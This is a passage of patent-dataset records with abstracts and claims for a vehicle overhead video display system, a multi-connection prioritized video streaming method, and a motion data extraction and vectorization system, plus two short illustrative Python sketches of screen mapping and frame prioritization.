The passenger vehicle recited in claim 8 wherein the horizontal support frame is spaced apart from the vehicle roof to create an air duct between the vehicle roof and the first overhead video display screen, and wherein the vehicle further includes at least one air blower for blowing cooled air through the air duct to avoid overheating the first overhead video display screen. 11. The passenger vehicle recited in claim 8 including a layer of cushioning material interposed between the first overhead video display screen and the horizontal support frame to cushion the first overhead display panel from shock and vibration as the vehicle moves. 12. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat; c) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen; f) at least one electrical storage battery storing low-voltage D.C. electrical power; g) a sine wave power inverter coupled to the at least one electrical storage battery storing low-voltage D.C. electrical power for producing a higher voltage A.C. electrical supply; h) wherein the higher voltage A.C. electrical supply is coupled to the first overhead video display screen and to the computer for supplying electrical power thereto; and i) an audio sound system for producing audio signals within the passenger compartment synchronized with the displayed video images, the audio sound system being coupled to the at least one electrical storage battery for receiving the low-voltage D.C. electrical power to avoid introduction of low frequency A.C. “hum” into the audio sound system. 13. (canceled) | 2,400 |
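The coordinated-image behavior recited throughout these claims (images that "appear to travel between" the overhead horizontal plane and a vertical end screen) can be sketched as a seam mapping along a single virtual path. This is a hypothetical geometry sketch: the screen lengths, the path parameterization, and the seam placement are assumptions, not the patent's design.

```python
# Illustrative model: one continuous path runs along the overhead screen and
# folds onto the vertical screen at the compartment's rearward end, so an
# object rendered at the mapped position each frame appears to travel
# seamlessly between the two planes.

OVERHEAD_LEN = 2.0   # metres of overhead screen along the vehicle axis (assumed)
VERTICAL_LEN = 1.0   # metres of vertical screen from roof toward floor (assumed)

def locate(s: float) -> tuple[str, float]:
    """Map a path position s (metres from the overhead screen's forward edge)
    to (screen, local offset on that screen). The seam sits at s == OVERHEAD_LEN."""
    if s < OVERHEAD_LEN:
        return ("overhead", s)            # still on the roof plane
    return ("vertical", s - OVERHEAD_LEN) # folded onto the rear vertical plane

# Step an object along the path, as the claimed computer would per frame.
for s in (0.5, 1.9, 2.1, 2.8):
    screen, off = locate(s)
    print(f"s={s:.1f} -> {screen} screen at {off:.1f} m")
```

A composite horizontal panel (claims 6 and 9) would extend `OVERHEAD_LEN` across the adjacent overhead screens without changing the mapping.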
9,165 | 9,165 | 14,311,698 | 2,458 | Methods, apparatus, systems, and software for implementing context adaptive video streaming using multiple streaming connections. Original video content is split into multiple bitstreams at a video streaming server and streamed to a video streaming client. Higher-importance video content, such as I-frames and the base layer for scalable video coder (SVC) content, is streamed over a high-priority streaming connection, while lower-importance video content is streamed over a low-priority streaming connection. The high-priority streaming connection may employ a reliable connection protocol such as TCP protocol, while the lower-priority connection may employ UDP or a modified TCP protocol under which some portions of the bitstream may be dropped. Cross-layer context adaptive streaming may be implemented under which context data such as network context and video application context information may be considered to adjust parameters associated with implementing one or more streaming connections. | 1. A method for streaming video content from a video streaming server to a video streaming client, comprising:
splitting video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream; transmitting the plurality of encoded video bitstreams using a plurality of streaming connections, wherein the high priority bitstream is transmitted over a first streaming connection using a reliable transport mechanism, and wherein the low priority bitstream is transmitted using a second streaming connection under which content that is not successfully received may or may not be retransmitted; reassembling the plurality of encoded video bitstreams that are received at the video streaming client into a reassembled encoded video bitstream; and decoding the reassembled encoded video bitstream to playback the video content as a plurality of video frames. 2. The method of claim 1, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 3. The method of claim 1, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) streaming connection. 4. The method of claim 1, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 5. The method of claim 1, further comprising:
reading encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separating out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; streaming the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections; and reassembling the I-frame, P-frame, and B-frame content in the high-priority and low-priority bitstreams such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 6. The method of claim 5, wherein the encoded video content that is read from storage includes audio content, and the method further comprises:
extracting the audio content as an audio bitstream; streaming the audio bitstream over the first streaming connection; and adding the audio content to the reassembled video content. 7. The method of claim 1, further comprising:
splitting video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; streaming the base layer bitstream over the first streaming connection; streaming the one or more enhancement layer bitstreams over the second streaming connection; and decoding the base layer bitstream and the one or more enhancement layer bitstreams at the video streaming client to playback the video content. 8. The method of claim 1, further comprising:
employing context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 9. The method of claim 8, wherein the context information includes network layer context information and application layer context information. 10. A video streaming server, comprising:
a processor; memory, operatively coupled to the processor; a network interface, operatively coupled to the processor; a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming server to,
split video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream;
transmit the high priority bitstream from the network interface to a video streaming client over a first streaming connection between the video streaming server and the video streaming client employing a reliable transport mechanism; and
transmit the low priority bitstream from the network interface to the video streaming client over a second streaming connection between the video streaming server and the video streaming client. 11. The video streaming server of claim 10, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 12. The video streaming server of claim 10, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) streaming connection. 13. The video streaming server of claim 10, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 14. The video streaming server of claim 10, wherein the video streaming server further comprises an interface to access one or more storage devices, and wherein execution of the instructions further causes the video streaming server to:
read encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separate out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; and stream the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections. 15. The video streaming server of claim 14, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming server to:
extract the audio content as an audio bitstream; and stream the audio bitstream over the first streaming connection. 16. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to:
split video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; stream the base layer bitstream over the first streaming connection; and stream the one or more enhancement layer bitstreams over the second streaming connection. 17. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 18. A video streaming client, comprising:
a processor; memory, operatively coupled to the processor; a display driver, operatively coupled to at least one of the processor and the memory; a network interface, operatively coupled to the processor; and a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming client to,
receive, at the network interface, a plurality of encoded video bitstreams from a video streaming server using a plurality of streaming connections, wherein the plurality of encoded video bitstreams are derived from original video content that has been split by the video streaming server into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream, and wherein the high priority bitstream is received over a first streaming connection and the low priority bitstream is received over a second streaming connection;
reassemble the plurality of encoded video bitstreams that are received at the network interface into a reassembled encoded video bitstream; and
decode the reassembled encoded video bitstream to playback the original video content via the display driver as signals representative of a plurality of video frames. 19. The video streaming client of claim 18, wherein the video streaming client comprises a wireless device having a wireless network interface and a display coupled to the display driver, wherein the plurality of encoded video bitstreams are received via the wireless network interface, and wherein the signals representative of the plurality of video frames are processed by the video streaming client to generate a sequence of video frames on the display. 20. The video streaming client of claim 18, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection, and the second streaming connection employs one of:
an HTTP over UDP (user datagram protocol) streaming connection; or an HTTP over a modified TCP streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 21. The video streaming client of claim 18, wherein the original video content comprises a plurality of frames including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order, and wherein execution of the instructions further causes the video streaming client to:
receive I-frame content via the first streaming connection; receive P-frame and B-frame content via the second streaming connection; and reassemble the I-frame, P-frame, and B-frame content into a recombined bitstream such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 22. The video streaming client of claim 21, wherein the video streaming client further comprises an audio interface, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming client to:
receive the audio content via the first streaming connection; extract the audio content as an audio bitstream; and playback the audio content over the audio interface. 23. The video streaming client of claim 18, wherein the original video content is encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams, and wherein execution of the instructions further causes the video streaming client to:
receive the base layer bitstream over the first streaming connection; receive the one or more enhancement layer bitstreams over the second streaming connection; and decode the base layer bitstream and the one or more enhancement layer bitstreams to playback the original video content via the display driver as signals representative of a plurality of video frames. 24. The video streaming client of claim 18, wherein execution of the instructions further causes the video streaming client to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 25. The video streaming client of claim 18, wherein one of the streaming connections employs TCP (transmission control protocol), and wherein execution of the instructions further causes the video streaming client to:
receive a plurality of TCP segments; detect that the plurality of TCP segments includes a missing TCP segment resulting in a gap followed by an out-of-order TCP segment; and determine that the out-of-order TCP segment may be forwarded for further processing without the missing TCP segment. | Methods, apparatus, systems, and software for implementing context adaptive video streaming using multiple streaming connections. Original video content is split into multiple bitstreams at a video streaming server and streamed to a video streaming client. Higher-importance video content, such as I-frames and the base layer of scalable video coding (SVC) content, is streamed over a high-priority streaming connection, while lower-importance video content is streamed over a low-priority streaming connection. The high-priority streaming connection may employ a reliable connection protocol such as the TCP protocol, while the lower-priority connection may employ UDP or a modified TCP protocol under which some portions of the bitstream may be dropped. Cross-layer context adaptive streaming may be implemented under which context data such as network context and video application context information may be considered to adjust parameters associated with implementing one or more streaming connections. 1. A method for streaming video content from a video streaming server to a video streaming client, comprising:
splitting video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream; transmitting the plurality of encoded video bitstreams using a plurality of streaming connections, wherein the high priority bitstream is transmitted over a first streaming connection using a reliable transport mechanism, and wherein the low priority bitstream is transmitted using a second streaming connection under which content that is not successfully received may or may not be retransmitted; reassembling the plurality of encoded video bitstreams that are received at the video streaming client into a reassembled encoded video bitstream; and decoding the reassembled encoded video bitstream to playback the video content as a plurality of video frames. 2. The method of claim 1, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 3. The method of claim 1, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) streaming connection. 4. The method of claim 1, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 5. The method of claim 1, further comprising:
reading encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separating out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; streaming the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections; and reassembling the I-frame, P-frame, and B-frame content in the high-priority and low-priority bitstreams such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 6. The method of claim 5, wherein the encoded video content that is read from storage includes audio content, and the method further comprises:
extracting the audio content as an audio bitstream; streaming the audio bitstream over the first streaming connection; and adding the audio content to the reassembled video content. 7. The method of claim 1, further comprising:
splitting video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; streaming the base layer bitstream over the first streaming connection; streaming the one or more enhancement layer bitstreams over the second streaming connection; and decoding the base layer bitstream and the one or more enhancement layer bitstreams at the video streaming client to playback the video content. 8. The method of claim 1, further comprising:
employing context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 9. The method of claim 8, wherein the context information includes network layer context information and application layer context information. 10. A video streaming server, comprising:
a processor; memory, operatively coupled to the processor; a network interface, operatively coupled to the processor; and a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming server to,
split video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream;
transmit the high priority bitstream from the network interface to a video streaming client over a first streaming connection between the video streaming server and the video streaming client employing a reliable transport mechanism; and
transmit the low priority bitstream from the network interface to the video streaming client over a second streaming connection between the video streaming server and the video streaming client. 11. The video streaming server of claim 10, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 12. The video streaming server of claim 10, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) streaming connection. 13. The video streaming server of claim 10, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 14. The video streaming server of claim 10, wherein the video streaming server further comprises an interface to access one or more storage devices, and wherein execution of the instructions further causes the video streaming server to:
read encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separate out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; and stream the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections. 15. The video streaming server of claim 14, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming server to:
extract the audio content as an audio bitstream; and stream the audio bitstream over the first streaming connection. 16. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to:
split video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; stream the base layer bitstream over the first streaming connection; and stream the one or more enhancement layer bitstreams over the second streaming connection. 17. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 18. A video streaming client, comprising:
a processor; memory, operatively coupled to the processor; a display driver, operatively coupled to at least one of the processor and the memory; a network interface, operatively coupled to the processor; and a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming client to,
receive, at the network interface, a plurality of encoded video bitstreams from a video streaming server using a plurality of streaming connections, wherein the plurality of encoded video bitstreams are derived from original video content that has been split by the video streaming server into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream, and wherein the high priority bitstream is received over a first streaming connection and the low priority bitstream is received over a second streaming connection;
reassemble the plurality of encoded video bitstreams that are received at the network interface into a reassembled encoded video bitstream; and
decode the reassembled encoded video bitstream to playback the original video content via the display driver as signals representative of a plurality of video frames. 19. The video streaming client of claim 18, wherein the video streaming client comprises a wireless device having a wireless network interface and a display coupled to the display driver, wherein the plurality of encoded video bitstreams are received via the wireless network interface, and wherein the signals representative of the plurality of video frames are processed by the video streaming client to generate a sequence of video frames on the display. 20. The video streaming client of claim 18, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection, and the second streaming connection employs one of:
an HTTP over UDP (user datagram protocol) streaming connection; or an HTTP over a modified TCP streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 21. The video streaming client of claim 18, wherein the original video content comprises a plurality of frames including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order, and wherein execution of the instructions further causes the video streaming client to:
receive I-frame content via the first streaming connection; receive P-frame and B-frame content via the second streaming connection; and reassemble the I-frame, P-frame, and B-frame content into a recombined bitstream such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 22. The video streaming client of claim 21, wherein the video streaming client further comprises an audio interface, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming client to:
receive the audio content via the first streaming connection; extract the audio content as an audio bitstream; and playback the audio content over the audio interface. 23. The video streaming client of claim 18, wherein the original video content is encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams, and wherein execution of the instructions further causes the video streaming client to:
receive the base layer bitstream over the first streaming connection; receive the one or more enhancement layer bitstreams over the second streaming connection; and decode the base layer bitstream and the one or more enhancement layer bitstreams to playback the original video content via the display driver as signals representative of a plurality of video frames. 24. The video streaming client of claim 18, wherein execution of the instructions further causes the video streaming client to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 25. The video streaming client of claim 18, wherein one of the streaming connections employs TCP (transmission control protocol), and wherein execution of the instructions further causes the video streaming client to:
receive a plurality of TCP segments; detect that the plurality of TCP segments includes a missing TCP segment resulting in a gap followed by an out-of-order TCP segment; and determine that the out-of-order TCP segment may be forwarded for further processing without the missing TCP segment. | 2,400 |
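The splitting, prioritized transport, and order-restoring reassembly recited in the claims above can be sketched in a few lines. This is a hypothetical Python illustration, not the patented implementation: the `(seq, frame_type, payload)` tuple format, the function names, and the simulated lossy channel are all assumptions made for clarity.

```python
# Sketch of the claimed scheme: I-frames travel over a reliable
# high-priority connection, P/B-frames over a lossy low-priority one,
# and the client restores the original encoded order by sequence number.
import random

def split_by_priority(frames):
    """Separate out I-frame content (high priority) from P/B-frame content."""
    high = [f for f in frames if f[1] == "I"]
    low = [f for f in frames if f[1] in ("P", "B")]
    return high, low

def lossy_channel(frames, drop_rate, rng):
    """Model the low-priority connection: lost content is not retransmitted."""
    return [f for f in frames if rng.random() >= drop_rate]

def reassemble(high, low):
    """Recombine both bitstreams so the original encoded order is restored,
    tolerating gaps where low-priority frames were dropped."""
    return sorted(high + low, key=lambda f: f[0])

frames = [(0, "I", b"i0"), (1, "P", b"p1"), (2, "B", b"b2"),
          (3, "I", b"i3"), (4, "P", b"p4"), (5, "B", b"b5")]
high, low = split_by_priority(frames)
received = reassemble(high, lossy_channel(low, 0.5, random.Random(7)))
# Every I-frame survives regardless of loss on the low-priority link,
# so decoding degrades gracefully instead of stalling.
assert {f[0] for f in high} <= {f[0] for f in received}
```

The same split/merge shape applies to the SVC variant in claims 16 and 23, with the base layer taking the place of the I-frames and enhancement layers taking the place of P/B content.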
9,166 | 9,166 | 14,665,810 | 2,482 | A method and a motion data extraction and vectorization system (MDEVS) extract and vectorize motion data of an object in motion with optimized data storage and data transmission bandwidth. The MDEVS includes an image sensor, a motion data processor, and a storage unit. The image sensor captures video data including a series of image frames of the object in motion. The motion data processor detects an object in motion from consecutive image frames, extracts motion data of the detected object in motion from each image frame, and generates a matrix of vectors defining the object in motion for each image frame using the extracted motion data. The motion data includes, for example, image data of the object, trajectory data, relative physical dimensions, a type of the object, time stamp of each image frame, etc. The storage unit maintains the generated matrix of vectors for local storage, transmission, and analysis. | 1. A method for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said method employing an image sensor in operable communication with a motion data processor configured to execute computer program instructions for performing one or more steps of said method, said method comprising:
receiving video data comprising a series of image frames of said object in motion from said image sensor by said motion data processor; detecting said object in motion from consecutive said image frames of said received video data by said motion data processor; extracting motion data of said detected object in motion from each of said image frames of said received video data by said motion data processor; generating a matrix of vectors configured to define said object in motion for said each of said image frames by said motion data processor using said extracted motion data; and maintaining said generated matrix of vectors in a storage unit for one or more of local storage, transmission, and analysis. 2. The method of claim 1, further comprising transmitting said generated matrix of vectors from said storage unit to an analytics system by an operations unit in operable communication with said storage unit for said analysis, wherein said analysis comprises one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said detected object in motion, and determining gestures of said object. 3. The method of claim 1, wherein said detection of said object in motion from said consecutive said image frames by said motion data processor comprises:
comparing said consecutive said image frames with each other by said motion data processor for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries by said motion data processor for confirming said detection of said object in motion. 4. The method of claim 1, further comprising:
dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library by said motion data processor based on matching of said extracted motion data with selection criteria; and extracting said motion data of subsequent said image frames by said motion data processor using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 5. The method of claim 1, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 6. The method of claim 1, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 7. The method of claim 1, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 8. The method of claim 1, further comprising compressing said video data by a data compression processor in operable communication with an image signal processor. 9. The method of claim 1, further comprising compressing said extracted motion data and said generated matrix of vectors by a data compression processor in operable communication with said motion data processor. 10. The method of claim 1, further comprising dynamically enhancing image granularity of said video data by an image signal processor in operable communication with said image sensor, for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 11. 
The method of claim 1, further comprising capturing one or more snapshots of said detected object in motion by said image sensor on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 12. A motion data extraction and vectorization system for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said motion data extraction and vectorization system comprising:
an image sensor configured to capture video data comprising a series of image frames of said object in motion; a motion data processor in operable communication with said image sensor, said motion data processor configured to receive said video data from said image sensor; said motion data processor further configured to detect said object in motion from consecutive said image frames of said received video data; said motion data processor further configured to extract motion data of said detected object in motion from each of said image frames of said received video data; said motion data processor further configured to generate a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data; and a storage unit in operable communication with said motion data processor, said storage unit configured to maintain said generated matrix of vectors for one or more of local storage, transmission, and analysis. 13. The motion data extraction and vectorization system of claim 12, further comprising an operations unit in operable communication with said storage unit, wherein said operations unit is configured to transmit said generated matrix of vectors from said storage unit to an analytics system for said analysis, wherein said analytics system is configured to perform said analysis comprising one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said object in motion, and determining gestures of said object. 14. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is configured to perform said detection of said object in motion from said consecutive said image frames by:
comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 15. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is further configured to dynamically select one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria, and wherein said motion data processor is further configured to extract said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 16. The motion data extraction and vectorization system of claim 12, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 17. The motion data extraction and vectorization system of claim 12, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 18. The motion data extraction and vectorization system of claim 12, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 19. 
The motion data extraction and vectorization system of claim 12, wherein said image sensor is further configured to capture one or more snapshots of said detected object in motion on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 20. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with an image signal processor, wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 21. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with said motion data processor, wherein said data compression processor is configured to compress said extracted motion data and said generated matrix of vectors received from said motion data processor. 22. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor in operable communication with said image sensor, wherein said image signal processor is configured to dynamically enhance image granularity of said video data received from said image sensor for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 23. 
The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor and a data compression processor positioned in parallel to each other, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor, and wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 24. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor. 25. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is operably connected in series between an image signal processor and a data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data enhanced by said image signal processor, wherein said image signal processor is integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor. 26. 
The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with a data compression processor, and wherein said motion data processor is operably connected between said image sensor and said data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data received from said image sensor, wherein said image signal processor is configured to enhance an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor and to compress said video data enhanced by said image signal processor. 27. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor and a data compression processor positioned in parallel communication with said motion data processor and disabled when motion of said object is not detected for optimizing power consumption required for said capture of said video data. 28. The motion data extraction and vectorization system of claim 12, wherein said storage unit is further configured to store enhanced video data, compressed video data, said extracted motion data, compressed motion data, said generated matrix of vectors, and a compressed said matrix of vectors. 29. The motion data extraction and vectorization system of claim 12 configured as one or more of an integrated chip and a computer system comprising at least one processor configured to execute computer program instructions for said extraction and said vectorization of said motion data of said detected object in motion with said optimized data storage and said data transmission bandwidth. 30. 
A computer program product comprising a non-transitory computer readable storage medium, said non-transitory computer readable storage medium storing computer program codes that comprise instructions executable by a motion data processor, said computer program codes comprising:
a first computer program code for detecting an object in motion from consecutive image frames of video data received from an image sensor; a second computer program code for extracting motion data of said detected object in motion from each of a series of image frames of said received video data, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames; and a third computer program code for generating a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data. 31. The computer program product of claim 30, wherein said first computer program code further comprises:
a fourth computer program code for comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and a fifth computer program code for comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 32. The computer program product of claim 30, wherein said second computer program code further comprises:
a sixth computer program code for dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria; and a seventh computer program code for extracting said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. | A method and a motion data extraction and vectorization system (MDEVS) extract and vectorize motion data of an object in motion with optimized data storage and data transmission bandwidth. The MDEVS includes an image sensor, a motion data processor, and a storage unit. The image sensor captures video data including a series of image frames of the object in motion. The motion data processor detects an object in motion from consecutive image frames, extracts motion data of the detected object in motion from each image frame, and generates a matrix of vectors defining the object in motion for each image frame using the extracted motion data. The motion data includes, for example, image data of the object, trajectory data, relative physical dimensions, a type of the object, time stamp of each image frame, etc. The storage unit maintains the generated matrix of vectors for local storage, transmission, and analysis.1. A method for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said method employing an image sensor in operable communication with a motion data processor configured to execute computer program instructions for performing one or more steps of said method, said method comprising:
receiving video data comprising a series of image frames of said object in motion from said image sensor by said motion data processor; detecting said object in motion from consecutive said image frames of said received video data by said motion data processor; extracting motion data of said detected object in motion from each of said image frames of said received video data by said motion data processor; generating a matrix of vectors configured to define said object in motion for said each of said image frames by said motion data processor using said extracted motion data; and maintaining said generated matrix of vectors in a storage unit for one or more of local storage, transmission, and analysis. 2. The method of claim 1, further comprising transmitting said generated matrix of vectors from said storage unit to an analytics system by an operations unit in operable communication with said storage unit for said analysis, wherein said analysis comprises one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said detected object in motion, and determining gestures of said object. 3. The method of claim 1, wherein said detection of said object in motion from said consecutive said image frames by said motion data processor comprises:
comparing said consecutive said image frames with each other by said motion data processor for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries by said motion data processor for confirming said detection of said object in motion. 4. The method of claim 1, further comprising:
